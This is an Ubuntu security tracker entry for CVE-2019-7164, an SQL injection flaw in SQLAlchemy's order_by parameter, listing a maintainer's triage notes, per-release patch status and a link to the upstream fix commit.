CVE-2019-7164

Priority
Description
SQLAlchemy through 1.2.17 and 1.3.x through 1.3.0b2 allows SQL Injection
via the order_by parameter.
Notes
mdeslaursince 1.0, sqlalchemy issues a warning when text() is omitted
this fix for this issue turns the warning into an error
since this change may break existing applications, it may not
get fixed, marking priority as low
Package
Upstream:needs-triage
Ubuntu 12.04 ESM (Precise Pangolin):DNE
Ubuntu 14.04 ESM (Trusty Tahr):DNE (trusty was needed)
Ubuntu 16.04 LTS (Xenial Xerus):needed
Ubuntu 18.04 LTS (Bionic Beaver):needed
Ubuntu 19.10 (Eoan Ermine):not-affected (1.2.18+ds1-2ubuntu1)
Ubuntu 20.04 (Focal Fossa):not-affected (1.2.18+ds1-2ubuntu1)
Patches:
Upstream:https://github.com/sqlalchemy/sqlalchemy/commit/30307c4616ad67c01ddae2e1e8e34fabf6028414
More Information

Updated: 2020-01-29 19:03:54 UTC (commit 40f18bf14da5fb50662e1f861ea594a462b207fe)